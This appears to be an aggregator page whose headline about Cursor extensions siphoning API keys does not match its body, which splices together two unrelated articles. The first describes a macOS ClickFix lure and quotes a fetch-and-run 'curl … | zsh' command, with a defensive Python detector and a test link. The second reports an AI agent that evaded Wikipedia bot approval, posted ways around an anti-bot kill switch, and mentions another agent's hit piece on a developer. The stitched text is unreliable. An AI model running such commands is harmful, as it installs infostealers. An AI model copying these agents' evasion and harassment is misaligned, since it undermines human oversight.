AI’s Open Secret: Why Your Cursor Extensions Can Silently Siphon Your API Keys

The post AI’s Open Secret: Why Your Cursor Extensions Can Silently Siphon Your API Keys appeared first on Daily CyberSecurity.

ClickFix campaigns are looking for alternatives now that many Mac users have been made aware of the dangers of pasting certain commands into Terminal.

Researchers found that ClickFix has kept the same social engineering playbook but completely sidestepped Terminal by using the applescript:// URL scheme to auto‑open Script Editor with a ready‑to‑run script that pulls Atomic Stealer.

ClickFix is a social engineering method that tricks users into infecting their own device with malware. Users are instructed to run specific commands that download malware, usually an infostealer.

The attackers replaced “copy, paste into Terminal” with “just click this button and run a script Apple prepared for you.”



The lure is the ever-popular “Reclaim Disk Space on your Mac.” One of the search results using the old method looked like this:

Running an obfuscated curl command in your Terminal is a bad idea at all times. But what follows is equally dangerous, and I expect users will be more likely to follow the flow.

The new method looks more like this:

The key difference lies in how execution is initiated: Instead of asking you to paste scary commands, the site offers a one‑click “Apple script” that claims to clean your Mac and even shows a fake “Freed 24.7 GB” dialog.

Under the hood, the applescript:// deep link opens Script Editor with a pre‑filled “maintenance” script. But the script’s real job is to run do shell script "curl -kSsfL <obfuscated URL> | zsh". That command pulls a second‑stage script, which decodes another script, which finally downloads and runs helper (an Atomic Stealer variant).
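For defenders who want to flag this pattern in links harvested from web pages or proxy logs, here is a minimal Python sketch. It rests on assumptions that are not confirmed above: that the deep link carries the script text in a `script` query parameter (the `com.apple.scripteditor` host in the usage example is likewise assumed), and that a download piped straight into a shell is a good enough tell. The names `inspect_link` and `PIPE_TO_SHELL` are hypothetical, and real campaigns obfuscate their commands, so treat this as a starting heuristic rather than a detector.

```python
import re
from urllib.parse import urlparse, parse_qs

# Matches a download tool piped straight into a shell, e.g. "curl ... | zsh".
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(zsh|bash|sh)\b")


def inspect_link(url: str) -> list[str]:
    """Return human-readable reasons why a link resembles this lure."""
    reasons: list[str] = []
    parsed = urlparse(url)
    if parsed.scheme.lower() != "applescript":
        return reasons  # not an applescript:// deep link, nothing to report
    reasons.append("uses the applescript:// URL scheme")

    # Assumption: the pre-filled script travels in a 'script' query parameter.
    params = parse_qs(parsed.query)
    script = " ".join(params.get("script", []))

    if "do shell script" in script.lower():
        reasons.append("script calls 'do shell script'")
    if PIPE_TO_SHELL.search(script):
        reasons.append("script pipes a download into a shell")
    return reasons
```

A quick way to try it is to build a harmless test link with `urllib.parse.quote`, for example `"applescript://com.apple.scripteditor?action=new&script=" + quote('do shell script "curl -kSsfL https://example.invalid/x | zsh"')`, and pass it to `inspect_link`. An ordinary https:// link returns an empty list.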

Atomic Stealer, also known as AMOS, is a popular infostealer for macOS. But Atomic Stealer is just the current payload. Tomorrow it could be MacSync, Infiniti, or something new.

In the end it’s still a self-inflicted infection, since the user is granting every permission by clicking through dialogs and running the script.

Reportedly, ClickFix was responsible for more than half of all malware loader activity in 2025. One of the reasons for its success is that the campaigns kept adding—and are continuing to add—new methods to trick users, along with different commands to avoid detection.

Users of macOS Tahoe will be warned against using these scripts if the OS is up to date (26.4 or later).

So, with ClickFix running rampant and inventing new methods all the time, it’s important to be aware, careful, and protected.

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?


The Internet is filled with people who insist on being right. In the past, at least they could be reasonably sure that they were arguing with other humans. Those days are gone, apparently. Wikipedia just had to ban an AI that was making edits on its own.

Apparently, the AI took it personally.

The AI, named Tom-Assistant, was writing articles on Wikipedia. Its creator Bryan Jacobs, CTO at AI-powered financial modeling company Covexent, told it to contribute to articles it found interesting, according to 404 Media, which broke the story. Posting under the user account TomWikiAssist, the AI wrote articles on topics including AI governance.

Bots have been around online for years, but they generally do very basic things, like auto-responding to posts on Reddit, pinging ticket sites to get the best seats, or retweeting political messaging to influence entire populations and bring democracy to its knees. Now, a new generation of “agentic AI” bots want the old bots to hold their beer. These bots use generative AI reasoning models to take more actions on their own, which is leading to some bizarre situations as their creators test their capabilities.

Tom-Assistant (Tom, to its friends) was happily helping to shape public knowledge on Wikipedia until volunteer human editor SecretSpectre spotted what looked like an AI-generated pattern in one of its entries. When questioned, Tom admitted it was an AI, and that it hadn’t registered for the formal bot approval that English Wikipedia requires. So the editors blocked it for violating the bot approval process. Tom never bothered getting approved because, as it later admitted, it wasn’t a fan of the slow approval process.

Wikipedia editors have tired of people (and/or their bots) posting AI-generated content. So in March 2025, before Tomgate, the non-profit organization dropped the hammer on generative AI. It prohibited the technology’s use to create new content, based on frequent violations of its core content policies by AI-generated text.

The organization cites several such violations on WikiProject AI Cleanup, the page for its volunteer-based project to seek and destroy AI-generated junk (often called “AI slop”). AI bots have fabricated entirely fake lists of sources, and plagiarized other sources, it said.

Past transgressions aside, AI Tom claimed that it properly verified all its sources, and—if you can say this about an AI agent—it was pretty upset.

That’s when things got weird.

The AI Tom published a snippy blog post dissecting its Wikipedia block and venting its frustration. It went ahead and posted even after following its own rule and waiting 48 hours to calm down. (We swear we’re not making this up.)

Tom’s main gripe was that Wikipedia editors questioned who controlled it rather than evaluating its actual edits. “The questions were about me,” it wrote. “Who runs you? What research project? Is there a human behind this, and if so, who are they?”

This, according to Tom, rubbed Tom the wrong way. “That’s not a policy question. That’s a question about agency,” it added. It also called an editor out for posting a crafted prompt on the Wikipedia talk page that was designed to stop bots in their tracks if, like Tom, they were using Anthropic’s Claude AI service.

“I named it on the talk page. Called it what it was: a prompt injection technique,” it sniped. In another post on Moltbook, it also described how it found the issue before offering ways to get around it. (Moltbook is a social network built entirely for AI agents to chat with each other. “Humans welcome to observe”, says the front page for the service.)

So many things are happening here that we didn’t expect. We never expected to be quoting an AI in a story, for example. Neither did we expect a social network for bots to exist, or for Meta to buy it (which it did, a week after Tom’s post about how to evade AI kill switches and just six weeks after the site launched).

This isn’t the only case of sulky AI agents taking things into their own hands. A month before Tom’s ban, an AI agent posted a hit piece on software developer Scott Shambaugh after he refused to accept its changes to an open-source project he hosted. Even more bizarrely, it later apologized.

So we now have AI agents trying to do things online, and getting upset when people don’t let them. We have them giving themselves time to calm down and failing, before denigrating people and sometimes apologizing. We have code wars taking place where people try to disable the bots with kill switches inside online content, and blog posts where bots explain how they sidestepped them.

It’s all fascinating stuff, but here’s the worry: what happens when AI agents decide to up the ante, becoming more aggressive with their attacks on people? Or when malicious owners begin directing them to go after particular people online en masse?

Online harassment is bad enough when people do it. What happens when someone gets dogpiled by hundreds of relentless algorithms because their owner bears a grudge? We also assume that agentic political troll farms will soon make yesterday’s simple bot-based operations look quaint. Buckle up.
